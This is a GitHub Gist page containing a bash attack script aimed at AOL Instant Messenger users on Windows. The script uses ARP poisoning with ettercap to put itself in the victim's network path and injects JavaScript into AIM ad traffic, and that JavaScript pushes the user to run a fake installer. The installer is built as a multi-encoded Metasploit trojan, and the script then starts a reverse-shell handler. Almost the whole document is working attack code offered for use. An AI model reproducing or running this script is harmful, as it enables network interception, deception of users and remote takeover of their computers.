Created
August 9, 2018 03:20
-
-
Save oxagast/725f30abefc5425e9ddcb1d92a193154 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working. | |
### Leverages binary file planting to My Documents via AIMs advertisement code. | |
### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe. | |
### Starts a reverse shell back to your handler on 192.168.2.5:443 by default. | |
### Marshall Whittaker | |
ATTACKER="192.168.2.10"; | |
VICTIM="192.168.2.5"; | |
GATEWAY="192.168.2.1"; | |
REVPORT="443"; | |
PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1"; | |
mkdir ~/aimpwn; | |
echo "if (tcp.src == 80) {" > ~/aimpwn/aimpwn.filter; | |
echo "if (search(DATA.data, \"atwola\")) {" >> ~/aimpwn/aimpwn.filter; | |
echo "replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");" >> ~/aimpwn/aimpwn.filter; | |
echo "msg(\"PWNT.\n\");" >> ~/aimpwn/aimpwn.filter; | |
echo "}" >> ~/aimpwn/aimpwn.filter; | |
echo "}" >> ~/aimpwn/aimpwn.filter; | |
etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef; | |
### wget section. | |
#wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe; | |
cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/; | |
msfpayload windows/shell/reverse_tcp LHOST=$ATTACKER LPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe; | |
### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to | |
### change ATTACKER IP or port. | |
ettercap -T -F ~/aimpwn/aimpwn.ef -q -M arp:remote /$GATEWAY/ /$VICTIM/ & | |
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKER lport=$REVPORT E; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment